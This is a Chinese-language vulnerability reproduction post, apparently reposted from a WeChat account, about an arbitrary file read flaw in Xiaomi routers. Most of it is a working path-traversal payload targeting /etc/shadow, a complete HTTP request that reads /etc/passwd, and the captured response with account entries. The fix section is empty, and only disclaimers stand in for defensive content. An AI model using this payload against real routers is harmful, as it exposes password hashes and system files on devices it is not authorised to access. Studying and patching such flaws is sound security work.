本文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
漏洞说明
小米路由器是小米公司推出的一款智能路由器,它采用了全新的天线设计方案,4根外置全向多振子高增益天线将2.4GHz和5GHz的天线独立开来,同时针对不同频段的特性进行特殊优化,WiFi信号更强。小米路由器现在在售的数量款式不多,其中WIFI5路由器2款:Redmi AC2100和小米AC2100,其余全部是WIFI6路由器。
小米 路由器存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器敏感信息
影响版本
小米 路由器
漏洞复现
payload:
/api-third-party/download/extdisks../etc/shadow
请求包:
GET /api-third-party/download/extdisks../etc/passwd HTTP/1.1
Host: IP:PORT
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
响应包:
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 02 Jul 2023 23:46:22 GMT
Content-Type: application/octet-stream
Content-Length: 190
Last-Modified: Tue, 11 Sep 2018 10:06:47 GMT
Connection: close
ETag: "5b9793b7-be"
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
....
Accept-Ranges: bytes
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
修复建议
本文章仅用于学习交流,不得用于非法用途
原文始发于微信公众号(才疏学浅的H6):小米 路由器 extdisks 任意文件读取漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论